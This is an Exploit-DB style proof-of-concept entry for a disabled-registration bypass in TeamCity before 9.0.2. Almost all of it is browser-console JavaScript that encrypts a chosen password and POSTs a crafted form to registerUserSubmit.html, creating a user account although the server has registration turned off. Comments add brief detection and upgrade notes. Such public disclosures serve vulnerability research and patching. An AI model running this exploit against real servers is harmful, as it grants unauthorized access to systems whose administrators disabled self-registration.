TeamCity < 9.0.2 - Disabled Registration Bypass

EDB-ID:

46514

CVE:

N/A


Author:

allyshka

Type:

remote


Platform:

Multiple

Date:

2018-03-28



/*
 * Proof-of-concept request for the issue named in the page title: a TeamCity
 * server older than 9.0.2 still processes a user-registration form submission
 * while registration is disabled.
 * The snippet uses objects it does not define (BS.*, OO, $F), so it presumably
 * has to run in the browser console on a TeamCity page that provides them.
 *
 * Defender notes:
 *  - Detection: POST requests to registerUserSubmit.html in the web or proxy
 *    access log of a server where registration is turned off, and user
 *    accounts that no administrator created.
 *  - Mitigation: the title puts the fix boundary at 9.0.2; upgrade to that
 *    version or later.
 *    NOTE(review): blocking registerUserSubmit.html at a reverse proxy looks
 *    like a possible stopgap; confirm against vendor guidance.
 */
// Sample account values submitted by the PoC.
var login = 'testuser'; // user login
var password = 'SuperMEgaPa$$'; // password
var email = 'testusername654@mailinater.com'; // email
/* Code */
// Only used below as the first argument handed to c.onCompleteSave().
var b = BS.LoginForm;
// $F is presumably Prototype.js's form-value helper: reads the value of the
// page's "publicKey" field.
var public_key = $F("publicKey");
// The password is encrypted client-side with that key; the same ciphertext is
// sent as both the password and the retyped password.
var encrypted_pass = BS.Encrypt.encryptData(password, $F("publicKey"));
// Request body of the registration form submission; submitCreateUser is sent
// with an empty value.
var parameters = 'username1='+login+'&email='+encodeURIComponent(email)+'&submitCreateUser=&publicKey='+public_key+'&encryptedPassword1='+encrypted_pass+'&encryptedRetypedPassword='+encrypted_pass;
// Response listener built on BS.ErrorsAwareListener: each error handler shows
// the text of the error node it receives in an alert.
var c = OO.extend(BS.ErrorsAwareListener, {
            onDuplicateAccountError: function(b) {
                alert(b.firstChild.nodeValue);
            },
            onMaxNumberOfUserAccountsReachedError: function(b) {
                alert(b.firstChild.nodeValue);
            },
            onCreateUserError: function(b) {
                alert(b.firstChild.nodeValue);
            },
            // Delegates to the base listener, then processes the redirect
            // carried in the response when the third argument (the
            // processErrors() result at the call site) is falsy.
            onCompleteSave: function(c, d, b) {
                BS.ErrorsAwareListener.onCompleteSave(c, d, b);
                if (!b) {
                    BS.XMLResponse.processRedirect(d);
                }
            }
        });
// Sends the POST to the registration endpoint. Per the page title, affected
// versions accept it even though registration is disabled.
BS.ajaxRequest("registerUserSubmit.html", {
                method: "post",
                parameters: parameters,
                onComplete: function(i) {
                    // No XML in the response: show the raw body instead.
                    if (!i.responseXML) {
                        alert(i.responseText);
                    } else {
                        var h = i.responseXML;
                        // Dispatches any errors in the XML to the listener's
                        // on...Error handlers (presumably; processErrors is
                        // not defined on this page).
                        var e = BS.XMLResponse.processErrors(h, c);
                        console.log(i.responseText);
                        // Four arguments are passed, but the override above
                        // declares three, so responseText is ignored there.
                        c.onCompleteSave(b, h, e, i.responseText);
                    }
                },
                // Failures and exceptions are only logged to the console.
                onFailure: function(i) {
                    console.log(i);
                },
                // The second argument h is not used.
                onException: function(i, h) {
                    console.log(i);
                }
            });